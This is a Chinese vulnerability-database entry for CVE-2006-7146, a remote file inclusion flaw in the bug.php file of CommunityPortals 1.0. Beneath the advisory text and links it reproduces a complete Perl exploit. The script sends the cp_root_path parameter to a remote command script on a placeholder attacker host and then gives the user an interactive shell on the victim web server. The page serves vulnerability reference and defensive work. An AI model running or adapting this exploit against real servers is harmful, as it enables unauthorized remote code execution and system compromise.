CommunityPortals Bug.PHP 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111241 漏洞类型 代码注入
发布时间 2006-10-11 更新时间 2009-03-16
CVE编号 CVE-2006-7146 CNNVD-ID CNNVD-200703-239
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28786
https://cxsecurity.com/issue/WLB-2007030085
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-239
|漏洞详情
**有争议的**LeicestershirecommunityPortals1.0build20051018及之前版本的bug.php中存在PHP远程文件包含漏洞。远程攻击者可以借助cp_root_path参数中的一个URL,执行任意的PHP代码。此漏洞不同于CVE-2006-5280。
|漏洞EXP
source: http://www.securityfocus.com/bid/20466/info

CommunityPortals is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input data.

An attacker can exploit this issue to have malicious PHP code execute in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

CommunityPortals 1.0 Build 12-31-18 and prior versions are affected by this issue.

#!/usr/bin/perl

#################################################################
#                                                               #
#            CommunityPortals Build 12-31-18                    #
#                                                               #
# Class:     Remote File Include Vulnerability                  #
#                                                               #
# Patch:     unavailable                                        #
#                                                               #
# Date:      2006/10/11                                         #
#                                                               #
# Remote:    Yes                                                #
#                                                               #
# Type:      high                                               #
#                                                               #
# Site:      http://www.leicestershirecommunity.com             #
#                                                               #
#################################################################


use IO::Socket;
use LWP::Simple;

$cmdshell="http://attacker.com/cmd.txt";   # <====== Change This Line With Your Personal Script

print "\n";
print "#################################################################\n";
print "#                                                               #\n";
print "# CommunityPortals <= 1.0   Remote File Include Vulnerability   #\n";
print "# Bug found By : Ashiyane Corporation                           #\n";
print "# Email: Nima Salehi    nima[at]ashiyane.ir                     #\n";
print "# Web Site : www.Ashiyane.ir                                    #\n";
print "#                                                               #\n";
print "#################################################################\n";


if (@ARGV < 2)
{
    print "\n Usage: Ashiyane.pl [host] [path] ";
    print "\n EX : Ashiyane.pl www.victim.com /CommunityPortals/  \n\n";
exit;
}


$host=$ARGV[0];
$path=$ARGV[1];

print "Type Your Commands ( uname -a )\n";
print "For Exiit Type END\n";

print "<Shell> ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to
host.\n\n";

    print $socket "GET ".$path."/bug.php?cp_root_path=".$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "<Shell> ";
    $cmd = <STDIN>;
}
|参考资料

来源:BID
名称:20467
链接:http://www.securityfocus.com/bid/20467
来源:BUGTRAQ
名称:20061011CommunityPortals<=1.0RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/448311/100/0/threaded
来源:SREASON
名称:2387
链接:http://securityreason.com/securityalert/2387